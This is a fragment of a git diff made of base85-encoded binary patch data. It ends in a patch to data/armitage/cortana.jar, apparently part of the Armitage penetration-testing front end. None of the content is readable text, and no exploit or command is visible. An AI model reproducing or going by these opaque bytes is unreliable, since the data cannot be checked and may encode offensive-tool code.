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 T^;M&*My(bZ8faRC!9D*2!Nv77 
diff --git a/data/armitage/cortana.jar b/data/armitage/cortana.jar index 94bebc6eac43b16d820a1027fa953a2b29c78b68..7c1da6dbfa1c3265b31fcf73b613ad13d5c408e0 100644 GIT binary patch delta 119438 zcmZ5{19)9c)Nag^q_J(=wr$%<W8*ZoZQDj;+iGk#cGL9sYrp^A`~BxR=XuXsYxd|} zvuF02*%3{HpqX()pa@E`;1F;iATS^xH|4Sk2vp$LzkzG|A4q}$_4tE<p!DEZzvV_y z$3L<T6n+xZSJ)(3Ft|UmE(Cs3-5PX~@4s>c7|s9a(}dDMp_A6Zr2Z(Z!I{(IJwTz7 z^uYgKX$|i8$8ZKN_y_wS@Y8nGz@U;8ApR$7hChaA2<Cqi(Eq_32*!V9f+QhGB;?=K z6#@DGJ~(Nhl;HSDevp5&iG*bPle{02<zFOCi&J8RP9lPW`J;$|!cWV8f`Ckthx&Vk z4iwYB2D(3O?}8%zgZuv?3^dgrne|^ZfTsK-heI>`!47EJKX?L7{0HG-?Ed8E4Wso3 zmtjo*ATR9S2HL^?EiVt2?vH*3mgWx<A`+$TQZPX#5yAbf*l$IuC;$rZe|h_dDML8+ zKdGnSD3ZG20RR5~+g4Eczg@-*|F;jA;Yri-4-ue~65)mZBn<dnL>>(yY|;n(-y)dd ziPG{Vnc)9hMhgNFvZad)<Nx!Re@d1{AVXsLU%FDj-?pM7{3T5q;cwe~5jg%7*n;r4 z&AtdkX?;1!fd9`4|H+aN@h`W^h<_^{fXMo9Jt>p65dnX?^E)E>A4EqY{bS=rQv8E4 zNYsC@1L<!!#voxP{X*jZqjUU3kQP_R1pVJ;Iez+EnSxK0e^O0;`g`Tur$1vM>7N|< zkWv2Fl#&0E?1N1Br}P};zvT8K6a6DM9U?D5{V{ySTKJ=g$0i1c{cRE9lAM>UP3pvB z0Xm=vfAYtOr#;a)#VzzJ!qAbyt?;kHNeZ=EfZ8a|^tZ7~H3gTA)pz#D2Tnq)7ZbjN zeo!4;N>>v;Fmz;m`<7vun~_5(c-;f;8L@>&U^E@+hN*4W?inc$Z4RxAn9Iy%x~EAp zZ$Z`aW<uA)F~BI}fm<feiiJb(_K-=83w%`5;x=2eiZIG2nNNv1$Z+Drdz(N_U|E;w zQPvT6z>c*UFZe~<>M<T~of&I3)|Q-VStP6rl_$1AIcqZMInaw1(0G!;YC6vRB_Pj= zKB$y&Kq;{-do2Gh@U%22fkL}UeJjoa&GW9iF~0<8#@Ch{vBLZPm4a-W&}@kn9|*mH zhpxu0$9I@68XHtJ)(}J^PnQ8M+F!`wD{RW;@LYnaob_BAm9Wygp(hJwG6v~vG~!MH zsA?%b>s$qjD3^AREga$%!$Hd86UqC{T@|06q?c_-n&HoL%kvoS<OMDxl}ar;Bz#~% zA4}_C?ZSm{O|N^=8DT#eYba&+i+2@T`HWtmiewPE1x@jX;$r@kJF5FNu*aIsMlhN{ z&PSY6AZ{?Ml094=^YR1of1Di#<R2EFu*~i&K|w%nlX~#TfGiBAcE&C)ek%6=a%wxP 